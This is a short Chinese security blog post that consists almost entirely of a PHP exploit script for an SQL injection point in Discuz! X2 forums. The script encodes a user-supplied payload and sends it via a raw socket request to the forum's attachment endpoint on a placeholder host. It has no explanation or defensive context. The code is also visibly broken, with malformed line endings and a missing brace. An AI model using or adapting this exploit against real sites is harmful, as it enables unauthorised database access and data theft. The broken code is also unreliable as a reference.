dz x2 注入点构造 exp

  • A+
所属分类:lcx

    By:anlfi

Exp:

global $tmp_expstr, $id;
$id=$_GET['id'];
//$_GET['$tmp_expstr'];
//$id=str_replace(" ","%20",$id);
//$id=str_replace("=","%3D",$id);

$tmp_expstr = $id;
//$tmp_expstr ="'";
//$id = $tmp_expstr;

 
function getData($host,$path,$expdata,$data){
global $host, $path, $tmp_expstr;
$host = "www.xxx.com";
 
$expdata = "/forum/forum.php?mod=attachment&findpost=ss&aid=".urlencode(urlencode(base64_encode($tmp_expstr)));
$data  = "GET $expdata HTTP/1.1rn";
$data .= "Host: $hostrn";
$data .= "Content-Type: application/x-www-form-urlencodedrn";
$data .= "Content-Length: ".strlen($expdata)."rn";
$data .= "Connection: Closernrn";
$data .= $expdata;
$fp = fsockopen($host, 80);
fputs($fp, $data);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 7);
return $resp;

echo getData($host,$path,$expdata,$data);
?>

文章来源于lcx.cc:dz x2 注入点构造 exp

相关推荐: 【其他】搜狐设计师广告里暗藏玄机!

http://2010.sohu.com/ 经测试(2010-7-10 13:22:19)真的存在!! 2012-9-12 14:26:25 补充:我勒个去,两年了,现在居然还在!!! 留言评论(旧系统): 佚名 @ 2012-11-16 12:35:10 程…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: